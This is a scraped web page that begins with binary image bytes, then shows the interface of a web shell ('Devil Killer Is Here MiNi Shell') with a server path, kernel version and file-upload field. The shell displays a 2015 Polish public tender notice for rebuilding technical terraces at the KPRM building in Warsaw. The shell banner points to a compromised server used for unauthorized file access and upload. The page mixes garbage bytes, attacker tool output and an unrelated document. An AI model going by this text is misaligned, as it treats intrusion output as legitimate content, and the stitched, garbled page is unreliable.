JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150821/216496-N-2015.html

<p class="kh_header"><b>Warszawa: Przebudowa tarasów technicznych w skrzydle A gmachu głównego KPRM</b><br>
<b>Numer ogłoszenia: 216496 - 2015; data zamieszczenia: 21.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Usług Wspólnych , ul. Powsińska 69/71, 02-903 Warszawa, woj. mazowieckie, tel. 22 6946359, faks 22 6946076.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cuw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja gospodarki budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa tarasów technicznych w skrzydle A gmachu głównego KPRM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy tarasu środkowego znajdującego się w skrzydle A, budynku KPRM Al. Ujazdowskie 1/3 w Warszawie.
Budynek  KPRM jest wpisany do rejestru zabytków pod numerem 1597. 
Ogólny zakres robót
Przedmiotem zamówienia jest wykonanie przebudowy tarasu środkowego o powierzchni 190 m2 znajdującego się w skrzydle A, budynku KPRM Al. Ujazdowskie 1/3 w Warszawie. 
W ramach wcześniejszej przebudowy stropodachu wykonano przystosowanie istniejącego stropu Kleina pod bocznymi fragmentami tarasu do większych obciążeń (3.50 kN/m2) w sposób opisany dla tarasu południowego oraz poprzez wymianę stropu Ackermana na użebrowany wokół otworów na świetliki strop żelbetowy monolityczny. 
Na tarasie znajdują się 2 przeszklone świetliki ze stali nierdzewnej o wymiarach 3800x3800 i 6800x3800 z klapami oddymiającymi, zlokalizowane w stropie bezpośrednio nad klatką schodową oraz w stropie nad pomieszczeniami przyległymi znajdującymi się w skrzydle C. Na warstwie wyrównawczej jest ułożona izolacja termiczna z wełny mineralnej grubości około 12cm z  pokryciem z papy termozgrzewalnej. Izolacje te są przeznaczone do demontażu.
W obrębie tarasu znajduje się 8 wywiewek instalacji kanalizacyjnej sanitarnej o średnicy dz110mm i dz75mm wykonanych z rur kielichowych kanalizacyjnych w kolorze szarym zakończonych daszkami. Pięć przewodów instalacji kanalizacyjnej dz110mm przechodzi przez ścianę tarasu ok. 20-40cm nad powierzchnią dachu a następnie po elewacji ponad dach. Pozostałe 3 wywiewki są zlokalizowane w dachu i przechodzą przez płaszczyznę dachu.
W obrębie tarasu znajduje się 15 zewnętrznych jednostek klimatyzacyjnych (freonowych). Przez taras wzdłuż południowo wschodniej barierki przebiegają przewody instalacji wody lodowej zaizolowane termicznie i zabezpieczone płaszczem ochronnym z blachy ocynkowanej.
W obrębie tarasu zainstalowane są urządzenia instalacji chłodzącej. Trasy kablowe dla potrzeb zasilania i sterowania pracą urządzeń wykonane są częściowo w postaci ocynkowanych, perforowanych koryt kablowych wyposażonych w pokrywy. Fragmenty tras instalacji elektrycznej dla potrzeb zasilania jednostek zewnętrznych klimatyzacji wykonanych jest w giętkich elektroinstalacyjnych rurach typu peszel. Stan techniczny części tras kablowych oraz osłon oceniony został jako zły.
Zakres instalacji oświetlenia ogólnego i ewakuacyjnego obejmuje 2 szt. hermetycznych opraw oświetleniowych montowanych na ścianach oraz 1 szt. oprawy ewakuacyjnej montowanej nad drzwiami. Na elewacji obiektu w obrębie tarasu znajduje się istnieje serwisowe gniazdo elektryczne 230V 16A 2P+Z  zainstalowane w hermetycznej obudowie podtynkowej.
W obrębie tarasu występuje instalacja odgromowa w postaci zwodów poziomych wykonanych drutem Fe/Zn fi 8mm instalowanym częściowo na uchwytach betonowych, a w części na podstawach betonowych zalewanych plastikiem. Jednostki zewnętrzne instalacji chłodzenia objęte są ochroną przez zastosowanie masztów odgromowych. U szczytu ściany tarasu zainstalowany jest maszt z kamerą instalacji monitoringu oraz maszt z zestawem dwóch anten radiokomunikacji. Wymienione urządzenia nie są objęte ochroną przez instalację odgromową.
Projektowana przebudowa obejmuje wymianę ocieplenia i pokrycia dachu bez wzrostu obciążeń, a także projekt pomostu ze stalowych krat pomostowych układanych na belkach stalowych z [120, opartych na żelbetowych słupkach zamocowanych do wzmacniającej strop Kleina płyty żelbetowej poprzez wklejanie prętów pionowych w nawiercone otwory w płycie żelbetowej żywicą HILTI HIT-HY 150. Beton słupków podporowych C12/15 (B15), stal prętów pionowych: A-IIIN(BSt500S), strzemiona ze stali A-0(St0S). Zabezpieczenie antykorozyjne belek stalowych powłokami malarskimi.
Istniejące stalowe konstrukcje wsporcze urządzeń instalacyjnych, zamontowanych na ścianach poddaszy i na ścianie maszynowni dźwigów, nie podlegających demontażowi i przeniesieniu na nowe podesty należy oczyścić ze śladów korozji i zabezpieczyć antykorozyjnie powłokami malarskimi.
Konstrukcja projektowanego pomostu technologicznego to ciężar ok. 50 kg/m2 w obrysie rzutu pomostu (konstrukcja stalowa + słupki żelbetowe). Przewidywane maksymalne obciążenie technologiczne wynosi 200 kg/m2, co w świetle informacji uzyskanych z dokumentacji projektowej wzmocnienia stropu nad IIIp (dopuszczalne obciążenie technologiczne 3.5 kN/m2 = 350 kg/m2) stanowi obciążenie mniejsze od dopuszczalnego o 100 kg/m2. 
Projektuje się nowe pokrycie z dwóch warstw papy termozgrzewalnej na warstwie izolacji termicznej z wysokoobciążalnego  polistyrenu ekstrudowanego XPS. Projektuje się także nowe konstrukcje wsporcze i pomosty techniczne, które umożliwią zamontowanie istniejących urządzeń technicznych instalacji chłodu. Projektuje się demontaż istniejących drzwi wraz z ościeżnicą i progiem, nadmurowanie progu bloczkami betonowymi, zaizolowane ściany w strefie cokołowej i montaż nowych drzwi o zmniejszonej wysokości (190 cm).  Nad 3 szt. drzwi prowadzących na taras z poddaszy skrzydeł A (2 szt.) i C (1 szt.) projektuje się zamocowanie daszków ze szkła hartowanego mocowanych na konstrukcji ze stali ocynkowanej i malowanej proszkowo na kolor jasno - szary RAL7035. Projektuje się wymianę wszystkich uszczelek systemowych na obwodzie klap  dymowych oraz uzupełnienie ubytków kitem poliuretanowym na bazie kauczuku wzdłuż krawędzi profili dociskowych na styku z szybami. Styk podstawy świetlika z jego konstrukcją projektuje się izolować dwukrotnie: taśmą elastyczną dylatacyjną na styku z izolacją szlamową i fartuchem bitumicznym na połączeniu z pokryciem dachowym. Projektuje się demontaż 3 wywiewek wyprowadzonych bezpośrednio z płaszczyzny stropu do poziomu kielichów nadstropowych. Na poziomie izolacji szlamowej kielich należy obetonować i założyć kołnierz  wtopiony między warstwy izolacji. Drugi kołnierz - papowy do wgrzania między dwie warstwy papy pokrycia należy założyć na przewód wywiewki. Wywiewki projektuje się wyprowadzić na rzędną +1,00. 
Projektuje się wszystkie jednostki stojące na konstrukcji opartej na dachu  zdemontować wraz z ich konstrukcją wsporczą oraz przewodami. Przed zdemontowaniem instalację i urządzenia należy opróżnić z czynnika chłodniczego przez stację odzysku freonu a czynnik przechować do czasu powtórnego montażu jednostek i uzupełnieniu jej freonem. Po wykonaniu zasadniczych prac o charakterze konstrukcyjnym jednostki projektuje się zamocować w nowych lokalizacjach na nowych ramach i konstrukcji wsporczej posadowionej na dachu.  Przewody chłodnicze projektuje się dopasować do nowych lokalizacji jednostek zewnętrznych uzupełniając brakujące odcinki przewodów rurami miedzianymi o odpowiedniej średnicy. 
Projektuje się demontaż, usunięcie jednostek z tarasu dźwigiem na poziom terenu przy budynku oraz zamocowanie ich na nowej konstrukcji stalowej ok. 40cm wyżej. Agregaty projektuje się oddzielić od konstrukcji przekładkami wibroizolacyjnymi i zabezpieczyć przed przesunięciem. Przed podniesieniem agregaty opróżnić z wody.
Przewody wody lodowej projektuje się opróżnić z wody i zdemontować. Po przemieszczeniu agregatów należy zamontować nowe przewody, zaizolować i zabezpieczyć płaszczem ochronnym z blachy ocynkowanej.
Ze względu na zakres przewidywanych prac branży architektoniczno budowlanej oraz zmianę lokalizacji urządzeń projektuje się wykonanie nowych koryt  kablowych dla potrzeb zasilania i sterowania pracą urządzeń zlokalizowanych na tarasie. Projektuje się wykonanie nowych tras z użyciem perforowanych, ocynkowanych koryt kablowych wyposażonych w pokrywy. Z uwagi na projektowany zakres prac przewiduje się konieczność zastosowania hermetycznych puszek elektroinstalacyjnych wykonanych z materiału o wzmocnionej odporności na promieniowanie UV, wyposażonych w listwy łączeniowe służących wykonaniu połączeń istniejących oraz nowych odcinków kabli zasilających i sterowniczych ze względu na zmianę lokalizacji posadowienia istniejących urządzeń. Dla zasilającej instalacji elektrycznej i teletechnicznej BTS zlokalizowanej na ścianie maszynowni dźwigów oraz pozostałych instalacji, których osłony uległy uszkodzeniu projektuje się zastosowanie węży dwudzielnych IP43 wykonanych z polipropylenu o wzmocnionej odporności na promieniowanie UV. Szczegółowy sposób montażu wraz z podaniem typu projektowanych elementów głównych tras kablowych zawarta zostanie w Projekcie Wykonawczym.  
Ze względu na stan techniczny projektuje się demontaż i wymianę istniejących hermetycznych opraw oświetlenia ogólnego oraz oprawy oświetlenia ewakuacyjnego. Uwzględniając charakter pracy instalacji oświetlenia (oświetlenie techniczne, używane sporadycznie), w celu ograniczenia konieczności wymiany źródeł światła przewiduje się zastosowanie opraw wyposażonych w źródła typu LED. Zakres projektu obejmuje wymianę istniejącej obudowy hermetycznej wraz z gniazdem oraz zastąpienie jej gniazdem 230V 16A 2P+Z w fabrycznej obudowie podtynkowej IP54 o zwiększonej odporności na promieniowanie UV. Szczegółowy zakres prac zawarty zastanie w Projekcie Wykonawczym.
Projektuje się całkowity demontaż istniejącej instalacji odgromowej w obrębie tarasu oraz wykonanie nowej instalacji uwzględniającej konieczność objęcia ochroną odgromową wszystkich urządzeń oraz konstrukcji wsporczych kamery i anten radiokomunikacyjnych. Ochronę zapewnić przez zastosowanie masztów odgromowych. Instalację wykonać drutem Fe/Zn fi 8mm instalowanym na podstawach betonowych zalewanych plastikiem (rozstaw co ok. 1m). Projektuje się połączenie projektowanej instalacji odgromowej z instalacją istniejącą odgromową obiektu. Szczegółowy zakres prac zawarty zastanie w Projekcie Wykonawczym.
Uwzględniające projektowany zakres prac związanych z instalacjami elektrycznymi oraz teletechnicznymi przewiduje się wykonanie nowych przejść pożarowych instalacji z zastosowaniem mas ogniochronnych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego zgodnie z art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.12.00-6, 45.45.30.00-7, 45.26.14.10-1, 45.22.32.10-1, 45.33.23.00-6, 45.33.12.20-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości 5.000 zł przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania wniosków, a jeżeli okres prowadzenie działalności jest krótszy- w tym okresie wykonał, minimum 3 roboty budowlane polegające na  wykonaniu robót ogólnobudowlanych zewnętrznych i instalacyjnych w budynku użyteczności publicznej, w tym: 
- 1 robota budowlana w obiekcie zabytkowym (przez obiekt zabytkowy należy rozumieć budynek wpisany do rejestru zabytków),
- 2 roboty ogólnobudowlane w których zakres wchodziła budowa/ remont/ przebudowa dachów technicznych,
o wartości min. 150.000 zł brutto każda robota.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, tj.:
1) kierownik budowy z uprawnieniami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz posiadający kwalifikacje, o których mowa w § 8 i § 13 rozporządzenia Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków,
2) kierownik robót z uprawnieniami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
3) kierownik robót z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi opłacona polisę ubezpieczeniową od odpowiedzialności cywilnej w wysokości co najmniej 190.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)
1)	w przypadku, gdy Wykonawcę reprezentuje pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy; 
2)	w przypadku, gdy wniosek składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 ustawy Pzp; 
3)	w przypadku, gdy Wykonawca korzysta z wiedzy i doświadczenia lub osób zdolnych do wykonania zamówienia, zobowiązany jest załączyć oryginał dokumentu zawierającego zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu:
Zgodnie z dyspozycją art. 51 ustawy Pzp w przypadku, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż 5, Zamawiający dokona wyboru Wykonawców, którym zostanie przekazana Specyfikacja Istotnych Warunków Zamówienia i którzy zostaną zaproszeni do składania ofert, w oparciu o ich własne zasoby, tj. Zamawiający zastrzega, że do oceny spełnienia warunków udziału w postępowaniu mających na celu kwalifikację do kolejnego etapu postępowania nie mają zastosowania przepisy art. 26 ust. 2b. 
Zamawiający przeprowadzi kwalifikację według następujących zasad - za każdą, powyżej 3 wymaganych, wykazaną robotę budowlaną odpowiadającą swym zakresem wymaganemu minimum, wykonaną w okresie ostatnich pięciu lat przed upływem terminu składania wniosków - Wykonawca otrzyma 1 punkt. W przypadku uzyskania przez wykonawców takiej samej ilości punktów, zamawiający wyłoni 5 i każdego następnego wykonawcę, który uzyskał taką samą ilość punktów jak ostatni zakwalifikowany.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określi zmiany w specyfikacji istotnych warunków zamówienia, która będzie przekazana Wykonawcom zaproszonym do składania ofert.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ zostanie przekazana Wykonawcom zaproszonym do złożenia ofert..</p>
